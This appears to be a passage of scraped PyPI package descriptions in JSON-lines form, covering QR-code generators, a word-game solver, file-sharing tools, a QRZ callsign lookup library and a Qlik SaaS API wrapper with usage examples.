Here are the two plots.Comparison of PCA degradation time with different number of rows and different methods for the case of 1000 columns.Comparison of PCA reduction time with different number of columns and different methods for the case of 30000 rows.We can see from the above two facts thatqrpcamay considerably cut program run time by using GPU acceleration, while also having a very cheap migration cost and a guaranteed impact.Requirementsnumpy>=1.21.1pandas>=1.3.5torch>=1.8.1torchvision>=0.8.0cudatoolkit>=0.7.1scikit-learn>=1.0.2Copyright & License2022 Xu Quanfeng (xuquanfeng@shao.ac.cn) & Rafael S. de Souza (drsouza@shao.ac.cn) & Shen Shiyin (ssy@shao.ac.cn) & Peng Chen (pengchzn@gmail.com)This program is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.ReferencesSharma, Alok and Paliwal, Kuldip K. and Imoto, Seiya and Miyano, Satoru 2013, International Journal of Machine Learning and Cybernetics, 4, 6, doi:10.1007/s13042-012-0131-7.CitingqrpcaIf you want to citeqrpca, please use the following citations.Software Citation: Xu Quanfeng, & Rafael S. de Souza. (2022). PCA algorithm of QR accelerated SVD decomposition (1.5). Zenodo.https://doi.org/10.5281/zenodo.6555926"} +{"package": "qrpic", "pacakge-description": "A command-line tool to create beautiful QR-codes with perfectly fitting logos!Usageqrpic takes (for the moment) only SVG images and produces an output SVG.\nYou invoke it simply withqrpic\"data text or link you want in your qr code\"path-to-logo.svgqrpic computes the exact shape of the SVG and removes QR-code pixels that are\nin the way, so they don\u2019t disturb your logo.qrpic offers various options to control the logo size, adding shells and buffer\nareas around your logo so it looks proper with just the right amount of spacing.\nFor more info, queryqrpic--help:usage: qrpic [-h] [--out FILE] [--shell {none,viewbox,convex,boundary-box}]\n [--ppi VALUE] [--svg-area VALUE] [--border VALUE]\n [--error-correction {high,medium,low}] [--buffer VALUE]\n [--shape-resolution VALUE]\n TEXT SVG-FILE\n\nGenerates QR-codes with centered logo images from SVGs in a beautiful manner,\nby not just overlaying them but also removing QR-code pixels properly so they\ndo not interfere with the logo. Note that this tool does not (yet) check\nwhether the generated QR-code is actually valid.\n\npositional arguments:\n TEXT The QR-code text.\n SVG-FILE Logo SVG to center inside the QR code to be generated.\n\noptional arguments:\n -h, --help show this help message and exit\n --out FILE Output filename. If none specified, outputs to stdout.\n --shell {none,viewbox,convex,boundary-box}\n Different types of shells to enclose the given SVG\n shape where to remove QR-code pixels. none (default):\n No shell geometry is applied. Removes pixels as per\n geometry inside the given svg. viewbox: Assume the SVG\n defined viewbox to be the shell. convex: Applies a\n convex hull. boundary-box: Applies a minimal boundary\n box around the SVG geometry.\n --ppi VALUE Pixels per inch. 
Can be used to override the default\n value of 96 for SVGs as defined per standard.\n --svg-area VALUE Relative area of the SVG image to occupy inside the\n QR-code (default 0.2).\n --border VALUE Amount of border pixels around the final QR-code.\n Default is 1.\n --error-correction {high,medium,low}\n QR-code error correction level. By default \"high\" for\n maximum tolerance.\n --buffer VALUE A round buffer around the SVG shape/shell to add\n (default is 0.04). The buffer is a relative measure.\n To deactivate the buffer, just pass 0 as value.\n --shape-resolution VALUE\n The interpolation resolution of circular geometry such\n as SVG circles or buffers (default 32).Noteqrpic is currently very much a prototype. It works, but the SVG parsing and\nshape extraction capabilities are in the moment limited.\nIf you encounter such a limitation or ugly output, pleasefile an issue!RoadmapBetter SVG parsing and shape extractionSupport non-vector graphics such as PNG, JPG, etc. Properly handle\nimage transparencyQR-code verification stepUse minimally necessary QR-code error correction level"} +{"package": "qrplatba", "pacakge-description": "python-qrplatbaPython library for generating QR codes for QR platba.Seehttp://qr-platba.cz/pro-vyvojare/for more information about the specification (available only in czech).fromqrplatbaimportQRPlatbaGeneratorfromdatetimeimportdatetime,timedeltadue=datetime.now()+timedelta(days=14)generator=QRPlatbaGenerator('123456789/0123',400.56,x_vs=2034456,message='text',due_date=due)img=generator.make_image()img.save('example.svg')# optional: custom box size and borderimg=generator.make_image(box_size=20,border=4)# optional: get SVG as a string.# Encoding has to be 'unicode', otherwise it will be encoded as bytessvg_data=img.to_string(encoding='unicode')InstallationTo install qrplatba, simply:$pipinstallqrplatbaNote on image file formatsThis module generates SVG file which is an XML-based vector image format. You can use various libraries and/or utilities to convert it to other vector or bitmap image formats. Below is an example how to uselibRSVGto convert SVG images.libRSVGlibRSVGrenders SVG files using cairo and supports many output image formats. 
It can also be used directly in console withrsvg-convertcommand.$rsvg-convert-fpdfexample.svg-oexample.pdfLicenseThis software is licensed underMIT licensesince version1.0.0.Changelog1.1.0(5 April 2023)Dropped support for Python 3.7Added pre-commit, black and ruff for code formatting1.0.0(4 April 2023)Warning:While the API is mostly backwards compatible, the look and size of the generated QR codes has changed.Updated requirements to support the latestqrcodeversionAdded support for custom output sizes usingbox_sizeandborderparametersChanged legacy setuptools topoetryDropped support for Python2.xand<3.7Changed license to MITAdded unit tests"} +{"package": "qrplatba-fpdf", "pacakge-description": "UNKNOWN"} +{"package": "qrpy", "pacakge-description": "qrpyqrpy is a simple command-line program capable of encoding and decoding basic QR codes.Installationpip install qrpyNote: You may need to additionally install zbar, as outlined in theinstallation stepsfor pyzbar.Examples\u276f qrpy encode --input \"Hello world\" --output \"hello.png\"\u276f qrpy decode --input \"hello.png\"Hello worldOmitting--outputwhen encoding will print the QR code to the console."} +{"package": "qrpypi", "pacakge-description": "QrPypiA Simple QrCode generator python packageInstallationpip install qrpypiWhat is a QR Code?A Quick Response code is a two-dimensional pictographic code used for its fast readability and comparatively large storage capacity. The code consists of black modules arranged in a square pattern on a white background. The information encoded can be made up of any kind of data (e.g., binary, alphanumeric, or Kanji symbols)Usagefrom qrpypi import qrcodeqrcode.make(\"Your url/ Text\")"} +{"package": "qrraj", "pacakge-description": "No description available on PyPI."} +{"package": "qr-rhino", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrs", "pacakge-description": "qrstool forQuarrel(and other word games)SummaryProvides word game-related tools that can be configured with custom settings, letter scores, and wordlists.Works on Python 3.6 and above. Tested on Windows 10.ContentsSummaryContentsThe qrs libraryDirect executionExample caseSettingsThe qrs libraryInstall the qrs library to use its functionality in your projects.python-mpipinstall--upgradeqrs>>>fromqrsimportbuild_settings,Ruleset>>>q=Ruleset(...build_settings(...{'max':8}...)...)>>>print(...q.solve_str('wetodlnm')...)---query:delmnotw(8letters)---8letters-18pointsMELTDOWN5letters-14pointsMOWED4letters-12pointsMEWL3letters-10pointsMEW,MOW,WEM2letters-6pointsEW,OW,WE,WO>>>_Direct execution$qrs\n\nqrs:_Upon being called from the command line, it will display an input screen.Type your letters into the field, press Enter, and wait for the program to calculate the best words. Once done, choose one from the list that corresponds with the number of letters you have available or the next lowest. See the example below to find out why you might not need to use all of your spaces.Example caseHere's an example using the default program settings. Our situation is the following:We're playingQuarrel, and thus, we get eight letters.Our letters arewetodlnm.We have seven spaces to use.After installing the library, we'll open a command line and run the program.Since we know we don't need words longer than eight letters, we can minimise loading time by configuring the program to only calculate for words of that length. 
We can do this by passing our desired settings as command arguments:$ qrs --max 8\n\nqrs:_Note: this has the same effect as creating aqrs.jsonfile, then running the command from the same directory:// qrs.json\n{\"max\": 8}\n\n## from folder with qrs.json\n$ qrsThe program will have to load a wordlist whichever way it is run. Once it finishes loading, we can input our letters and press Enter.qrs: wetodlnm\n\n--- query: delmnotw (8 letters) ---\n\n8 letters - 18 points MELTDOWN\n5 letters - 14 points MOWED\n4 letters - 12 points MEWL\n3 letters - 10 points MEW, MOW\n2 letters - 6 points OW, WE, WO\n\nqrs:_This output tells us that the anagram isMELTDOWN, but we can't make that word because we can only use seven letters. In this case, our best word isMOWED(14 points). Based on this output, we also know that our opponent cannot score higher than us without all eight spaces.Note: a word likeLETDOWNscores the same number of points asMOWED, but isn't recognised as a \"best word\" in this case. This is because when words are tied for points, the program will choose the word/s with the fewest letters.The fewer letters your word has, the faster you can write it into your game. This is especially important inQuarrel, as the tiebreaker for equal points is input speed.SettingsUpon being run from the command line, the program will automatically generate (or look for) aqrs.jsonfile in the directory from which the command is run. This file contains the program's settings, which can be changed to suit your needs.When using qrs as a library, you should pass adictwith any of the following keys intobuild_settingsto generate a full settings object, then pass the output to aRulesetto create a new instance. All currently supported settings, with their defaults:debug (default: false): Shows the program's inner workings whilst calculating. Note that this may negatively affect performance on certain devices or IDEs.exclude (default: []): List of words that the program will never output.game (default: \"quarrel\"): Determines the letter scoring system used for calculating points. The value here is passed intobuild_letter_scores(), and defaults back if invalid.include (default: []): List of additional words for the wordlist.lower (default: false): Displays output in lowercase letters. The default setting displays capital letters to mimic the style of word games likeScrabbleandQuarrel, however some people may find lowercase output more readable.max (default: longest length in wordlist): Determines the maximum word length the program will calculate for.min (default: 2): Determines the minimum word length the program will calculate for.noscores (default: false): Determines whether point values for words are considered, in which case only the highest-scoring words are displayed. If you don't care about scoring, turn this on to see all words.repeats (default: false): Determines whether letters can be used more than once. Change this according to your word game's rules; for example,Scrabbletiles can only be used once in a single word, whereasNew York Times'sSpelling Beeallows the reuse of letters.When running directly: To change your settings, do one of the following:Openqrs.jsonin a text editor and change any values. Make sure to save the file once you're done.Pass the setting as a command argument like this:--setting valueIf applicable, this will automatically update the settings file.$ qrs --lower --max 8 --debug\n\n# debug info displayed here\n\nqrs:_Ifqrs.jsonis not in your folder, try running the program and letting it fully load. It should then create the file.After savingqrs.json, the program will not change if it's already running.
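For reference, a qrs.json that combines several of the settings listed above might look like the sketch below; the values are purely illustrative, not recommendations.// qrs.json\n{\"max\": 8, \"min\": 3, \"lower\": true, \"repeats\": false}When using qrs as a library, the same keys go into build_settings, e.g. q = Ruleset(build_settings({'max': 8, 'min': 3, 'lower': True, 'repeats': False})), exactly as in the earlier example.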
Close the program and rerun it to use the changed settings."} +{"package": "qr-server", "pacakge-description": "qr_serverThis project is the extension of Flask project (https://pypi.org/project/Flask/), aimed on fast creation of web-apps with minimalistic syntax.\nThe solution provides support for basic HTTP-routing (with file sending), fast DTOs\n(data transfer objects for formalization and validation of response data),\nsimple jwt-token system, role manager (database-side rights system) and configurable logging.\nSee 'example' directory for a minimal working application built using this libraryUsage example:fromqr_server.ServerimportMethodResult,QRContextfromqr_server.ConfigimportQRYamlConfigfromqr_server.TokenManagerimportrequire_token,JwtTokenManagerfromqr_server.FlaskServerimportFlaskServerdeflogin(ctx:QRContext):login=ctx.json_data['login']password=ctx.json_data['password']user_id=ctx.repository.check_credentials(login,password)ifuser_idisNone:returnMethodResult('wrong credentials',500)user=ctx.repository.get_user_data(user_id)ifuserisNone:returnMethodResult('account not found',500)jwt_token=ctx.managers['token_manager'].make_token(user_id)returnMethodResult(JwtDTO(jwt_token))@require_token()defuser_info(ctx:QRContext,user_id):user=ctx.repository.get_user_data(user_id)ifuserisNone:returnMethodResult('account not found',500)returnMethodResult(UserInfoDTO(**user))classAuthServer(FlaskServer,AuthRepository):\"\"\"DI class\"\"\"if__name__==\"__main__\":config=QRYamlConfig()config.read_config('config.yaml')host=config['app']['host']port=config['app']['port']token_man=JwtTokenManager()token_man.load_config(config['jwt'])server=AuthServer()server.init_server(config['app'])ifconfig['app']['logging']:server.configure_logger(config['app']['logging'])server.register_manager(token_man)server.register_method('/login',login,'POST')server.register_method('/info',user_info,'GET')server.run(host,port)"} +{"package": "qrsh", "pacakge-description": "No description available on PyPI."} +{"package": "qrshare", "pacakge-description": "qrshareServe files or folders on local network with ease.For extra security provide a password--password [password]InstallpipinstallqrshareTermuxInstallTermuxfromGoogle Play.Update packages:apt update && apt upgradeSetup storage:termux-setup-storageInstall Python:pkg install pythonInstall qrshare:pip install qrshareUse as described below inTerminal.UsageTerminalServe a specific directory or fileqrshareservepath/to/shareServe the current directoryqrshareserve.Send toWindows onlyCreating a shortcut inshell:sendtoprovides for easier use of conveniencecommandlineqrshareconfig--sendtomanuallyPressWindows+rand entershell:sendto%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\SendToCreate shortcut with commandqrshare servein foldernow option qrshare should appear when you right click to a file or folderCommandlineqrshare --helpUsage:__main__.py[OPTIONS]COMMAND[ARGS]...\n\nOptions:--helpShowthismessageandexit.\n\nCommands:configchangeuserconfigurationsserveservegivenlistpathsaspergivenoptionsqrshare serve --helpUsage:__main__.pyserve[OPTIONS]PATHS...servegivenlistpathsaspergivenoptions\n\nOptions:-p,--passwordTEXTwhenprovidedeverydevicerequireauthentication--portINTEGERwaitressserverport--helpShowthismessageandexit.passwordis given preference over global passwordqrshare config --helpUsage:__main__.pyconfig[OPTIONS]changeuserconfigurations\n\nOptions:-p,--passwordTEXTsetaglobalpassword--remove-passwordremovecurrentlysetglobalpassword--sendtoresetwindows'Send 
To'shortcut--openopenconfigdirectory--helpShowthismessageandexit.A global password can be removed by setting it to an empty string (\"\")Code Examplefrom qrshare import App\n\napp = App(paths, debug=True)\napp.serve()"} +{"package": "qrshare-io-cli", "pacakge-description": "QRshare.io CLIA CLI tool for uploading files with the qrshare.io service. It returns a QR code with a download URL back in the console.InstallationThe package is available at https://pypi.org/project/qrshare-io-cli/. Execute the following command:pip install qrshare-io-cliIf you see a warning like this:WARNING: The script qrs is installed in '/usr/local/Cellar/python@3.8/3.8.17/Frameworks/Python.framework/Versions/3.8/bin' which is not on PATH.,\nthen add the path specified above to the ${PATH} environment variable. E.g.echo '# Added by qrshare.io-cli' >> ~/.bash_profile\necho 'export PATH=\"/usr/local/Cellar/python@3.8/3.8.17/Frameworks/Python.framework/Versions/3.8/bin:${PATH}\"' >> ~/.bash_profile\necho -e \"\\n\" >> ~/.bash_profileUsageqrsOutputUploading: .gitignore... [QR code printed to the terminal as a large block of Unicode full-block characters, omitted here] followed by a summary table:Filename: .gitignore; Size: 29 bytes; Download URL: https://api2.qrshare.io/api/v2/transfer/ddl/m9jQM2Pre06lDownloading with cURLcurl --content-disposition https://api2.qrshare.io/api/v2/transfer/ddl/m9jQM2Pre06lNote: make sure to use the --content-disposition parameter to keep the original filename"} +{"package": "qrstreamer", "pacakge-description": "QRStreamerCompanion program to TXQR Android. Streams files to a set of QR codes and a GIF of those QR codes, to be decoded by the Android app.InstallationRun pip install -U qrstreamer to install the command-line tools. Make sure your pip scripts directory is in the operating system PATH.UsageRun as qrstreamer --help to see usage information.CreditsUses a slightly modified port of anrosent's LT coding library to perform LT coding.
Inspired by (but incompatible with)divan's TXQR for iPhones"} +{"package": "qrstu", "pacakge-description": "Q \u2013 Rainer Schwarzbach\u2019s Text UtilitiesTest conversion and transcoding utilitiesInstallation from PyPIpip install qrstuInstallation in a virtual environment is strongly recommended.UsageguessTheguessmodule can be used to automatically detect and repair encoding errors\n(duplicate UTF-8 encoding of an already UTF-8 encoded text by misreading\nthe bytes as another 8-bit encoding, eg. '\u00c3\u00a4\u00c3\u00b6\u00c3\u00bc'),\nbut as the name says, it mostly works on the basis of an educated guess.reduceThereducemodule can be used to reduce Unicode text\nin Latin script to ASCII encodable Unicode text,\nsimilar toUnidecodebut taking a different approach\n(ie. mostly wrapping functionality from the standard library moduleunicodedata).\nUnlikeUnidecodewhich also transliterates characters from non-Latin scripts,reducestubbornly refuses to handle these.You can, however, specify an optionalerrors=argument in thereduce.reduce_text()call, which is passed to the internally usedcodecs.encode()function, thus taking advance of the codecs module errors handling.transcodeThetranscodemodule provides various functions for decoding\nand encoding byte sequences to/from Unicode text.Further readingPlease see the documentation athttps://blackstream-x.gitlab.io/qrstufor detailed usage information.If you found a bug or have a feature suggestion,\nplease open an issuehere"} +{"package": "qrs-wrapper", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrt", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrtools", "pacakge-description": "No description available on PyPI."} +{"package": "qrtransfer", "pacakge-description": "No description available on PyPI."} +{"package": "qrtray", "pacakge-description": "Shows the current clipboard content as a QR code. Great to send an URL or small amount of text to your smartphone.It is already working, but I\u2019m not really happy with the code structure.Licenseqrtray, shows the current clipboard content as a QR codeCopyright (C) 2016 Andr\u00e9-Patrick BubelThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.You should have received a copy of the GNU General Public License\nalong with this program. If not, see ."} +{"package": "qrtt", "pacakge-description": "No description available on PyPI."} +{"package": "qrtt-data", "pacakge-description": "No description available on PyPI."} +{"package": "qruise-qiskit", "pacakge-description": "qruise-qiskitAdd a short description here!A longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 4.3.1. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qruise-remote", "pacakge-description": "qruise-remoteAdd a short description here!A longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 4.3.1. 
For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qruise-toolset", "pacakge-description": "qruise-toolsetAdd a short description here!A longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 4.3.1. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qrules", "pacakge-description": "Quantum Number Conservation RulesQRules is a Python package forvalidating and generating particle reactionsusing\nquantum number conservation rules. The user only has to provide a certain set of\nboundary conditions (initial and final state, allowed interaction types, expected decay\ntopologies, etc.). QRules will then span the space of allowed quantum numbers over all\nallowed decay topologies and particle instances that correspond with the sets of allowed\nquantum numbers it has found.The resulting state transition objects are particularly useful foramplitude analysis\n/ Partial Wave Analysisas they contain all information (such as expected masses,\nwidths, and spin projections) that is needed to formulate an amplitude model.Visitqrules.rtfd.iofor more information!For an overview ofupcoming releases and planned functionality, seehere.Available featuresInput: Particle databaseSource of truth: PDGPredefined particle list fileOption to overwrite and append with custom particle definitionsState transition graphFeynman graph like description of the reactionsVisualization of the decay topologyConservation rulesOpen-closed designLarge set of predefined rulesSpin/Angular momentum conservationQuark and Lepton flavor conservation (incl. isospin)Baryon number conservationEM-charge conservationParity, C-Parity, G-Parity conservationMass conservationPredefined sets of conservation rules representing Strong, EM, Weak interactionsContributeSeeCONTRIBUTING.md"} +{"package": "qrun", "pacakge-description": "No description available on PyPI."} +{"package": "qrunner", "pacakge-description": "No description available on PyPI."} +{"package": "qr-upn", "pacakge-description": "QR UPN packageThis is a small package that will generate a QR UPN.\nThe package also checks the field length for each field and the validity of the field format.\nThis ensures that the generated QR code will be valid.\nQR code validation checks were done using thissoftware.Feel free to address any issues or improvements.Installationpip install qr-upn==1.2.0Functions:All the following functions can be accessed using:fromqr_upn.utilsimport*gen_qr_upnThis function create a UPN document with a valid QR code.\nThe parameters the functionrequiresare the following:p_name: Payer namep_address: Payer addressp_post: Payer postal address and postal numberprice: Price the payer has to paydate: Date when the document is valid (DD.MM.YYYY)purpose_code: Purpose code which has to be valid (list of codes:LINK)purpose: Purpose of the paymentpay_date: Date until the bill has to be paid (DD.MM.YYYY)r_iban: Receiver IBANr_reference: Receiver reference (validated as mentioned:LINK)r_name: Receiver namer_address: Receiver addressr_post: Receiver postal address and postal numberOptional parameters:save_to: Path where the QR UPN document will be saved tosave_qr: Path where the QR code will be saved toshow: Visualize the generated QR UPN documentdata={'p_name':'JANEZ NOVAK','p_address':'Dunajska ulica 1','p_post':'1000 Ljubljana','price':'100','date':'25.04.2019','purpose_code':'SWSB','purpose':'Pla\u010dilo najemnine za marec 
2019','pay_date':'30.04.2019','r_iban':'SI56037210001000102','r_ref':'SI06 125412-135-1257','r_name':'RentaCar d.o.o.','r_address':'Pohorska ulica 22','r_post':'2000 Maribor','save_to':'./test.png','save_qr':'./test_qr.png','show':True}gen_qr_upn(**data)validate_referenceFunctions that checks if the provided reference code is valid.\nIt supports the SI and RF model.\nThe function accepts a single parameter:validate_reference('SI02 5124123-62146-63720')SI_model_checkFunction that handles the SI reference model validation.SI_model_check('SI02 5124123-62146-63720')RF_model_checkFunction that handles the RF reference model validation.RF_model_check('SI02 5124123-62146-63720')"} +{"package": "qrutils", "pacakge-description": "No description available on PyPI."} +{"package": "qrwifi", "pacakge-description": "qrwifiDisplay a QR code for your wifi in the terminal.Currently only supports macOS. Create an issue if you want me to support your OS.Installationpip install qrwifiUsageqrwifi"} +{"package": "qrwr", "pacakge-description": "No description available on PyPI."} +{"package": "qrypto", "pacakge-description": "UNKNOWN"} +{"package": "qrzlib", "pacakge-description": "qrzlibPython interface to qrz.comIn order to use this interface you need to have a valid Ham radio\nlicense and a qrz.com account.Usageimportqrzlibqrz=qrzlib.QRZ()qrz.authenticate('qrz-id','xmldata-key')try:qrz.get_call('W6BSD')print(qrz.fullname,qrz.zip,qrz.latlon,qrz.grid,qrz.email)exceptQRZ.NotFoundaserr:print(err)On the first request the class QRZ get the data from the qrz web\nservice. Then, by default, the information will be cached forever.the object QRZ can also return all the fields as a dictionary of as a\njson object.In[6]:qrz.to_dict()Out[6]:{'call':'W6BSD','aliases':'KM6IGK','dxcc':'291','fname':'Fred',...'ituzone':'6','geoloc':'user','born':None}"} +{"package": "qrztools", "pacakge-description": "qrztoolsWARNING:This library is now deprecated. Usecallsignlookuptoolsinstead.QRZ API interface in PythonInstallationqrztoolsrequires Python 3.8 at minimum.# synchronous requests only$pipinstallqrztools# asynchronous aiohttp only$pipinstallqrztools[async]# both sync and async$pipinstallqrztools[all]# enable the CLI$pipinstallqrztools[cli]Note:Ifrequests,aiohttp, orrichare installed another way, you will also have access to the sync, async, or command-line interface, respectively.DocumentationDocumentation is available onReadTheDocs.CopyrightCopyright 2021 classabbyamp, 0x5cReleased under the BSD 3-Clause License.SeeLICENSEfor the full license text."} +{"package": "qs", "pacakge-description": "DescriptionQuickShare (qs) is a variant of the (now legacy) SimpleHTTPServer present in\npython 2.x. It allows one to share quickly directories by opening a http\nserver. qs supports both python2 and python3.You can define an upload rate limit to prevent the clients from using all\nyour bandwidth and it automatically searches a free port if the given or\ndefault one is taken.Why QuickShare?http://xkcd.com/949/Sharing is fun, but it quickly becomes a pain when dealing with multiple\noperating systems, platforms and unexperimented users. 
Nowadays, almost\neverything has a web interface, why should\u2019nt we use it?DocumentationUsage: qs [-h] [-p PORT] [-r RATE] [--no-sf] [FILE]...\n\nOptions:\n -h, --help Print this help and exit.\n -p, --port PORT Port on which the server is listenning.\n Default is 8000\n -r, --rate RATE Limit upload to RATE in ko/s.\n Default is 0 meaning no limitation.\n --no-sf Do not search a free port if the selected one is taken.\n Otherwise, increase the port number until it finds one.\n --version Print the current version\n\nArguments:\n FILE Files or directory to share.\n Default is the current directory: `.'\n If '-' is given, read from stdin.\n If 'index.html' is found in the directory, it is served.Dependenciesdocopthttps://github.com/docopt/docoptor \u201cpip install docopt\u201dInstallThe simplest is to usepip install qsor, in this directory,python setup.py installLicenseThis program is under the GPLv3 License.You should have received a copy of the GNU General Public License\nalong with this program. If not, see .ContactMain developper: C\u00e9dric Picard\nEmail: cedric.picard@efrei.net"} +{"package": "qsa", "pacakge-description": "OpenQSA provides this Python package for QSA analysis of signals, including the JSON files exported from RTXI.It is recommended to install Python 3.7 with pip3 on the computer.It is also a good practice to work in isolation inside a python3 virtual environment.The package can be installed using pip3:pip3 install qsaDetailed instructions for installation and use are given on the official web siteopenqsa.org"} +{"package": "qsaas", "pacakge-description": "StatusqsaasA wrapper for the Qlik Sense Enterprise SaaS APIs.Intended audienceDevelopers -- familiarity with theQlik Sense Enterprise APIsis required.High-level benefits:Automatic pagination on GETs, returning all results.Ability to asynchronously make POSTs, PUTs, and PATCHs, where one can input the amount of threads you'd like (default is 10), dramatically decreasing processing time.Ease of establishing and managing connections to multiple tenants.Ability to connect to any API endpoint.Table of ContentsInstallationConfigurationBasic UsageAdvanced UsageComplete list of functionsAdditional NotesInstallationpip install qsaasDependencies (auto-installed by pip):requests\nrequests_toolbelt\naiohttp\nasyncioConfigurationTo import qsaas, as qsaas only currently has one class,Tenant, the simplest way is:fromqsaas.qsaasimportTenantFrom there, one can instantiate a newTenantobject by executingq=Tenant()Option AIf connecting locally, the simplest way can be to use a json file for each tenant, as these files can be securely stored locally. 
The file must be a valid json file with the following structure:{\"api_key\":\"\",\"tenant_fqdn\":\"..qlikcloud.com\",\"tenant_id\":\"\"}When creating a newTenantobject then, the named paramconfigcan be used as follows (in this case, the file name is \"config.json\":q=Tenant(config=\"config.json\")Option BIf it's preferred to feed in the api_key, tenant_fqdn, and tenant_id in a different manner, one can instead execute:q=Tenant(api_key=,tenant=,tenant_id=)Basic UsageGet all users from a tenant and print their IDsusers=q.get('users')foruserinusers:print(user['id'])Get a specific user from a tenantuser=q.get('users',params={\"subject\":\"QLIK-POC\\dpi\"})Get all apps from a tenant and print their namesapps=q.get('items',params={\"resourceType\":\"app\"})forappinapps:print(app['name'])Get all spaces from a tenantspaces=q.get('spaces')Create a new userbody={\"tenantId\":q.tenant_id,\"subject\":'WORKSHOP\\\\Qlik1',\"name\":'Qlik1',\"email\":'Qlik1@workshop.com',\"status\":\"active\"}q.post('users',body)Reload an applicationreload=q.post('reloads',json.dumps({\"appId\":\"\"}))Reload an application and waitreload_id=q.post('reloads',json.dumps({\"appId\":\"\"}))['id']status=Nonewhilestatusnotin['SUCCEEDED','FAILED']:time.sleep(1)status=q.get('reloads/'+reload_id)['status']Publish an applicationapp_id=space_id=app=q.post('apps/'+app_id+'/publish',json.dumps({\"spaceId\":space_id}))payload={\"name\":app['attributes']['name'],\"resourceId\":app['attributes']['id'],\"description\":app['attributes']['description'],\"resourceType\":\"app\",\"resourceAttributes\":app['attributes'],\"resourceCustomAttributes\":{},\"resourceCreatedAt\":app['attributes']['createdDate'],\"resourceCreatedBySubject\":app['attributes']['owner'],\"spaceId\":space_id}q.post('items',json.dumps(payload))Change the owner of an applicationapp_id=user_id=q.put('apps/'+app_id+'/owner',json.dumps({\"ownerId\":user_id}))Import an applicationwithopen('.qvf','rb')asf:data=f.read()app=q.post('apps/import',data,params={\"name\":\"\"})payload={\"name\":app['attributes']['name'],\"resourceId\":app['attributes']['id'],\"description\":app['attributes']['description'],\"resourceType\":\"app\",\"resourceAttributes\":app['attributes'],\"resourceCustomAttributes\":{},\"resourceCreatedAt\":app['attributes']['createdDate'],\"resourceCreatedBySubject\":app['attributes']['owner']}q.post('items',json.dumps(payload))Advanced UsageUpload a file to DataFilesfile_path=directory_path+'\\\\'+file_namebody=open(file_path,'rb')q.post('qix-datafiles',body,params={\"connectionId\":conn_id,\"name\":file_name})Asynchronously reload multiple applicationsNote:The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. Do not make this integer too high to avoid rate limiting.app_ids=['','','']payloads=[json.dumps({\"appId\":app_id})forapp_idinapp_ids]q.async_post('reloads',payloads=payloads)Asynchronously delete apps that have the name \"delete_me\"Note:This process currently requires deleting both from theappsanditemsendpoints. The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. 
Do not make this integer too high to avoid rate limiting.items=q.get('items',params={\"resourceType\":\"app\",\"name\":\"delete_me\"})delete_dict={}delete_dict['items']=[item['id']foriteminitems]delete_dict['apps']=[item['resourceId']foriteminitems]foreindelete_dict:q.async_delete(e,ids=delete_dict[e])Asychronously add usersNote:The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. Do not make this integer too high to avoid rate limiting.payloads=[]foriinrange(10):user_subject='WORKSHOP\\\\Qlik'+str(i+1)user_name='Qlik'+str(i+1)user_email='Qlik'+str(i+1)+'@workshop.com'body={\"tenantId\":q.tenant_id,\"subject\":user_subject,\"name\":user_name,\"email\":user_email,\"status\":\"active\"}payloads.append(body)q.async_post('users',payloads=payloads)Asynchronously copy applications and assign them to new ownersNote:This is the only \"custom\" style function in all of qsaas, due to the fact that it has hardcoded endpoints and has an multi-step process--as it can copy applications and then assign those applications ot new owners in one go. The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. Do not make this integer too high to avoid rate limiting.Copy app and assign ownership to new usersq.async_app_copy('',users=['',''])Simply copy an app 10 times, without assigning new ownershipq.async_app_copy('',copies=10)Customize HeadersNote:This is available for all functions, but should largely not be needed (most headers are automatically generated by the Python libraries used). If the need arises to pass in custom headers, or to overwrite the existing headers, one can leverage the keyword paramheadersas per below.Upload an image to an applicationdata=open('your_image.png','rb').read()q.put('apps//media/files/your_image.png',data,headers={\"Content-Type\":\"image/png\"})Complete list of functionsq.get()q.post()q.put()q.patch()q.delete()q.async_post()q.async_put()q.async_patch()q.async_app_copy()*only custom functionFor each function, one can always refer to the docstring for a helpful description, and most provide examples. For instance,help(q.get)will output:Description\n --------------------\n GETs and paginates all results. Takes optional params.\n\n Mandatory parameters\n --------------------\n endpoint (str), exclude api/{version}\n\n Optional parameters\n --------------------\n params (dict)\n\n Example Usage\n --------------------\n Example 1:\n get('users')\n\n This will return all users.\n\n Example 2:\n get('items', params={\"resourceType\":\"app\"})\n\n This will return all apps from items.Additional NotesAPI DocumentationIt is highly encouraged to review the API documentation atthe qlik.dev portal. As this wrapper does not have wrapped Qlik functions (aside from theasync_app_copyfunction), it is integral to know the API appropriate endpoints to call.SupportThis project is built and maintained by Daniel Pilla, a Principal Analytics Platform Architect at Qlik. This project is however not supported by Qlik, and is only supported through Daniel."} +{"package": "qsafecrypto", "pacakge-description": "QSafeCryptoUtilizing cryptography in your application shouldn't be an intimidating and challenging task. Lets simplify cryptography in your app with QSafeCrypto. 
